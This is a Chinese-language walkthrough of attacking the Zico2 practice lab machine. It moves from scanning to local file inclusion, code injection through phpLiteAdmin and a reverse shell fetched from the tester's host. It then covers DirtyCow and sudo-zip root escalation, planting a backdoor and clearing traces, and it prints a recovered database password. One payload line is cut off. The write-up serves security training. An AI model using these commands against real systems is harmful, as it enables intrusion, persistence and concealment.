靶机渗透（五）Zico2

靶机Zico2

 

一、实验环境

二、实验步骤

（一）信息收集

1.查看测试机的IP信息，判断所处网段

2.主机发现（netdiscover）

3.端口扫描（masscan/nmap）

（二）Web渗透

1.浏览web网页（80端口）

2.尝试利用文件包含漏洞

3.网站指纹信息扫描（whatweb）

4.目录扫描（dirb）

5.访问/dbadmin目录

6.查找数据库信息（用户）

7.尝试利用代码注入漏洞

8.获得反弹shell

9.Dirtycow提权

10.启用中国菜刀，获取webshell权限

11.清除痕迹

12.另一种提权方式（wp-config.php）

---

一、实验环境

1.靶机：Zico2

2.测试机：Kali

3.帮凶机：Windows 10

二、实验步骤

（一）信息收集

1.查看测试机的IP信息，判断所处网段

2.主机发现（netdiscover）

netdiscover -i eth0 -r 192.168.10.0/24

3.端口扫描（masscan/nmap）

masscan --rate=10000 --ports 0-65535 192.168.10.151
nmap -sV -T4 -p 111,80,52448,22 192.168.10.151

• 开启了22（ssh服务）、80（http服务）、111（rpcbind，远程过程调用，将不同服务与对应的端口进行绑定，以便支持机器间的互操作）、37495（status）端口

（二）Web渗透

1.浏览web网页（80端口）

• 发现文件包含漏洞

2.尝试利用文件包含漏洞

http://192.168.10.151/view.php?page=../../../../../etc/passwd

3.网站指纹信息扫描（whatweb）

whatweb 192.168.10.151

4.目录扫描（dirb）

dirb http://192.168.10.151

• 将扫描出的路径逐个尝试

5.访问/dbadmin目录

http://192.168.10.151/dbadmin/

• 看到一个登录界面，尝试弱口令（admin），登录成功

6.查找数据库信息（用户）

a.查找到账号信息

b.破解账号密码

c.尝试远程登录（失败）

7.尝试利用代码注入漏洞

a.查询dbadmin数据库版本信息（searchsploit）

• 存在代码注入漏洞

b.创建一个新的数据库（/usr/databases/hack.php）

c.创建一个test表

d.设置缺省值

e.利用文件包含漏洞

http://192.168.10.151/view.php?page=../../../../usr/databases/hack.php

8.获得反弹shell

a.测试机编写一个shell.txt，并开启apache服务

&3 2>&3");?>
/etc/init.d/apache2 start

b.将上步测试用的dbadmin中的test表删除，新建一个test1表

c.上传shell.txt文件至靶机

d.测试机开启监听

nc -vnlp 6666

e.利用文件包含漏洞，访问dbadmin数据库

http://192.168.10.151/view.php?page=../../../../usr/databases/hack.php

f.拿到shell，转换成交互式tty

python -c 'import pty; pty.spawn("/bin/bash")'

9.Dirtycow提权

a.将dirtycow提权文件传至靶机

wget http://192.168.10.128/dirty.c

b.gcc编译dirty.c，执行exp

gcc -pthread dirty.c -o exp -lcrypt
./exp 123

c.查看passwd文件，查看此时用户情况

head -1 /etc/passwd

d.验证使用被改变的root用户登录

su firefart

e.编写后门文件

• 使用echo '' > abc.php编写后门

f.恢复password文件

mv /tmp/passwd.bak /etc/passwd
head -1 /etc/passwd

10.启用中国菜刀，获取webshell权限

11.清除痕迹

12.另一种提权方式（wp-config.php）

a.拿到shell后，查看用户文件

b.查看wp-config.php文件

cat wp-config.php

• 发现MySQL database的账号zico（sWfCsfJSPV9H3AmQzw8）

c.尝试远程登录（成功）

ssh [email protected]

d.查看目前用户可执行与无法执行的指令

sudo -l

e.提权

touch /tmp/exploit
sudo zip exploit.zip exploit -T --unzip-command="python -c 'import pty; pty.spawn(\"/bin/sh\")'"

• 创建一个随机文件，并用 zip 命令进行压缩

• sudo 用管理员权限执行 -T 检查文件的完整性，这个参数可以让他执行下一个参数 --unzip-command，在这个参数中写入一个python的交互shell

 

---

总结：

1.浏览网页时，发现?page=xxx，尝试是否存在文件包含漏洞

2.在获取到一个登录界面时，常规做法：弱口令尝试、暴力破解（字典要足够强大）

3.数据库中存在用户信息的可能性极大，服务器版本信息可能会找到版本漏洞

4.wp-config.php文件也存在许多重要配置信息

5.提权前可查看目前用户可执行与无法执行的指令（sudo -l）